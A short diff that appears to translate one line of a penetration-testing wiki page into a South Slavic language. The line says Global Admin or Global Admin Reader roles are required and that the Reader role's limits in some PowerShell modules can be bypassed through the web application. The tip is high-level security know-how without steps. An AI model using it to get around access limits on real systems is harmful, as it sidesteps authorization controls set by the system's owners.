-You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**.
+Potrebni su vam **Global Admin** ili barem **Global Admin Reader** (ali imajte na umu da je Global Admin Reader malo ograničen). Međutim, ta ograničenja se pojavljuju u nekim PS modulima i mogu se zaobići pristupanjem funkcijama **putem web aplikacije**.
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-